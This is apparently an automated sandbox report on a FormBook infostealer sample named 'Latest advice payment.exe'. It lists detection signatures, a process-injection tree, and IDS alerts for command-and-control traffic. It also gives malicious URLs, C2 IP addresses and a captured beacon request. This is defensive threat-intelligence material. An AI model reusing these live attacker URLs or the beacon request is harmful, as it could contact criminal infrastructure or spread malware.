Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Latest advice payment.exe

Overview

General Information

Sample name:Latest advice payment.exe
Analysis ID:1567859
MD5:b1ff44d20bc312e62d55daf8a8cf5b07
SHA1:c470001e130a55b1081ba071c47c0e1e60570453
SHA256:5b359667005091665aad2d9773ea103cbdb88c47a1a9a7b44243d83ef90b8a15
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Latest advice payment.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\Latest advice payment.exe" MD5: B1FF44D20BC312E62D55DAF8A8CF5B07)
    • svchost.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Latest advice payment.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CWtKbasqHVKAO.exe (PID: 4388 cmdline: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 8164 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • CWtKbasqHVKAO.exe (PID: 768 cmdline: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7324 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Process Parents
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" , CommandLine: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe, NewProcessName: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe, OriginalFileName: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 8164, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" , ProcessId: 768, ProcessName: CWtKbasqHVKAO.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine|base64offset|contains: iq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ParentImage: C:\Users\user\Desktop\Latest advice payment.exe, ParentProcessId: 7336, ParentProcessName: Latest advice payment.exe, ProcessCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ProcessId: 7396, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine|base64offset|contains: iq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ParentImage: C:\Users\user\Desktop\Latest advice payment.exe, ParentProcessId: 7336, ParentProcessName: Latest advice payment.exe, ProcessCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ProcessId: 7396, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T23:27:37.679953+010020507451Malware Command and Control Activity Detected192.168.2.649808161.97.168.24580TCP
                2024-12-03T23:28:03.251083+010020507451Malware Command and Control Activity Detected192.168.2.64986827.124.4.24680TCP
                2024-12-03T23:28:19.294902+010020507451Malware Command and Control Activity Detected192.168.2.649907149.88.81.19080TCP
                2024-12-03T23:28:35.059248+010020507451Malware Command and Control Activity Detected192.168.2.64994785.159.66.9380TCP
                2024-12-03T23:28:50.156059+010020507451Malware Command and Control Activity Detected192.168.2.649983185.27.134.14480TCP
                2024-12-03T23:29:04.924338+010020507451Malware Command and Control Activity Detected192.168.2.650021172.67.145.23480TCP
                2024-12-03T23:29:19.934138+010020507451Malware Command and Control Activity Detected192.168.2.650033172.67.167.14680TCP
                2024-12-03T23:29:35.274693+010020507451Malware Command and Control Activity Detected192.168.2.650038154.88.22.10180TCP
                2024-12-03T23:29:50.452738+010020507451Malware Command and Control Activity Detected192.168.2.650042209.74.77.10780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T23:27:37.679953+010028554651A Network Trojan was detected192.168.2.649808161.97.168.24580TCP
                2024-12-03T23:28:03.251083+010028554651A Network Trojan was detected192.168.2.64986827.124.4.24680TCP
                2024-12-03T23:28:19.294902+010028554651A Network Trojan was detected192.168.2.649907149.88.81.19080TCP
                2024-12-03T23:28:35.059248+010028554651A Network Trojan was detected192.168.2.64994785.159.66.9380TCP
                2024-12-03T23:28:50.156059+010028554651A Network Trojan was detected192.168.2.649983185.27.134.14480TCP
                2024-12-03T23:29:04.924338+010028554651A Network Trojan was detected192.168.2.650021172.67.145.23480TCP
                2024-12-03T23:29:19.934138+010028554651A Network Trojan was detected192.168.2.650033172.67.167.14680TCP
                2024-12-03T23:29:35.274693+010028554651A Network Trojan was detected192.168.2.650038154.88.22.10180TCP
                2024-12-03T23:29:50.452738+010028554651A Network Trojan was detected192.168.2.650042209.74.77.10780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T23:27:54.985524+010028554641A Network Trojan was detected192.168.2.64984727.124.4.24680TCP
                2024-12-03T23:27:57.735515+010028554641A Network Trojan was detected192.168.2.64985427.124.4.24680TCP
                2024-12-03T23:28:00.532358+010028554641A Network Trojan was detected192.168.2.64986027.124.4.24680TCP
                2024-12-03T23:28:11.122946+010028554641A Network Trojan was detected192.168.2.649889149.88.81.19080TCP
                2024-12-03T23:28:13.813553+010028554641A Network Trojan was detected192.168.2.649895149.88.81.19080TCP
                2024-12-03T23:28:16.485474+010028554641A Network Trojan was detected192.168.2.649900149.88.81.19080TCP
                2024-12-03T23:28:27.110367+010028554641A Network Trojan was detected192.168.2.64992785.159.66.9380TCP
                2024-12-03T23:28:29.782267+010028554641A Network Trojan was detected192.168.2.64993485.159.66.9380TCP
                2024-12-03T23:28:32.454058+010028554641A Network Trojan was detected192.168.2.64994085.159.66.9380TCP
                2024-12-03T23:28:42.023341+010028554641A Network Trojan was detected192.168.2.649965185.27.134.14480TCP
                2024-12-03T23:28:44.743434+010028554641A Network Trojan was detected192.168.2.649970185.27.134.14480TCP
                2024-12-03T23:28:47.368148+010028554641A Network Trojan was detected192.168.2.649977185.27.134.14480TCP
                2024-12-03T23:28:57.141359+010028554641A Network Trojan was detected192.168.2.649999172.67.145.23480TCP
                2024-12-03T23:28:59.557104+010028554641A Network Trojan was detected192.168.2.650005172.67.145.23480TCP
                2024-12-03T23:29:02.485088+010028554641A Network Trojan was detected192.168.2.650013172.67.145.23480TCP
                2024-12-03T23:29:12.000623+010028554641A Network Trojan was detected192.168.2.650030172.67.167.14680TCP
                2024-12-03T23:29:14.601977+010028554641A Network Trojan was detected192.168.2.650031172.67.167.14680TCP
                2024-12-03T23:29:17.310071+010028554641A Network Trojan was detected192.168.2.650032172.67.167.14680TCP
                2024-12-03T23:29:27.125540+010028554641A Network Trojan was detected192.168.2.650034154.88.22.10180TCP
                2024-12-03T23:29:29.797405+010028554641A Network Trojan was detected192.168.2.650036154.88.22.10180TCP
                2024-12-03T23:29:32.471179+010028554641A Network Trojan was detected192.168.2.650037154.88.22.10180TCP
                2024-12-03T23:29:42.352365+010028554641A Network Trojan was detected192.168.2.650039209.74.77.10780TCP
                2024-12-03T23:29:45.015365+010028554641A Network Trojan was detected192.168.2.650040209.74.77.10780TCP
                2024-12-03T23:29:47.917261+010028554641A Network Trojan was detected192.168.2.650041209.74.77.10780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5PAvira URL Cloud: Label: malware
                Source: http://www.soainsaat.xyz/rum2/Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Latest advice payment.exeReversingLabs: Detection: 47%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Latest advice payment.exeJoe Sandbox ML: detected
                Source: Latest advice payment.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CWtKbasqHVKAO.exe, 00000007.00000000.2349023099.000000000065E000.00000002.00000001.01000000.00000005.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000000.2505529018.000000000065E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_005C445A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CC6D1 FindFirstFileW,FindClose,0_2_005CC6D1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_005CC75C
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_005CEF95
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_005CF0F2
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_005CF3F3
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005C37EF
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005C3B12
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_005CBCBC

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49808 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49808 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49854 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49860 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49889 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49847 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49907 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49907 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49900 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49895 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49868 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49868 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49927 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49940 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49934 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49947 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49947 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49965 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49970 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49977 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49983 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49983 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50021 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50033 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50033 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50042 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50042 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 172.67.145.234:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: Joe Sandbox ViewIP Address: 149.88.81.190 149.88.81.190
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_005D22EE
                Source: global trafficHTTP traffic detected: GET /xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
